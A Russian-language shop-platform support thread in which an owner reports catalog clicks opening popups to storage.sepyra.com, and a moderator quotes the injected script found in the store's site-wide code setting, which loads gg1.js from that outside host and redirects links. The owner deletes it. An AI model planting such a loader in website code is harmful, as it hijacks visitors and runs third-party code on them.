Перейти к содержимому


При Нажатии Позиций В Каталоге Выскакивает Http://storage.sepyra.com/?_Src=_Popwnd

#ошиб #sepyra

  • Авторизуйтесь для ответа в теме
Сообщений в теме: 3

#1 ofalina

ofalina

    Пользователь

  • Пользователи
  • PipPip
  • 10 сообщений

Отправлено 30 Ноябрь 2015 - 09:53

Странная ссылка выскакивает при нажатии на любую позицию в каталоге. Вот такая ссылка выдается http://storage.sepyr...m/?_src=_popwnd
Что это такое? У меня за все оплачено и кто это такие я не знаю. Сайт мой www.saletyt.ru
Что делать?! Помогите. Покупатели уже начали жаловаться

Причем эта ссылка выскакивает по позициям в каталоге, в "недавно просмотренных товарах" и открывается в отдельном окне

#2 MikDark

MikDark

    Активный участник

  • Модераторы
  • 6 468 сообщений

Отправлено 30 Ноябрь 2015 - 10:31

Просмотр сообщенияofalina (30 Ноябрь 2015 - 09:53) писал:

Странная ссылка выскакивает при нажатии на любую позицию в каталоге. Вот такая ссылка выдается http://storage.sepyr...m/?_src=_popwnd
Что это такое? У меня за все оплачено и кто это такие я не знаю. Сайт мой www.saletyt.ru
Что делать?! Помогите. Покупатели уже начали жаловаться

Причем эта ссылка выскакивает по позициям в каталоге, в "недавно просмотренных товарах" и открывается в отдельном окне

У Вас в разделе Настройки - Основные, в поле Код для Вывода на всех станицах магазина есть код:
<script type="text/javascript">var Grapery1=window.Grapery1||{sCode:16737};(function($){var d=document,w=window,e="addEventListener",a=d.createElement("script");$.r=!1;a.type="text/javascript";a.async=!0;a.charset="UTF-8";a.src="//storage.sepyra.com/gg1.js";d.getElementsByTagName("head")[0].appendChild(a);d[e]&&d[e]("DOMContentLoaded",function(){if($.r){return;}$.r=!0;w.__gG&&__gG(w);},!1);})(Grapery1);</script>


именно он делает редирект со всех ссылок на данный сайт.

#3 ofalina

ofalina

    Пользователь

  • Пользователи
  • PipPip
  • 10 сообщений

Отправлено 30 Ноябрь 2015 - 10:46

Спасибо за ответ. Странно. Это раньше не было. И позавчера не было. Что нужно сделать, просто удалить?

Удалила. Спасибо вам огромное!!!!

#4 Rencho

Rencho

    Пользователь

  • Пользователи
  • PipPip
  • 34 сообщений

Отправлено 01 Декабрь 2015 - 17:33

Такая же хрень. И кто его сюда добавил?




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных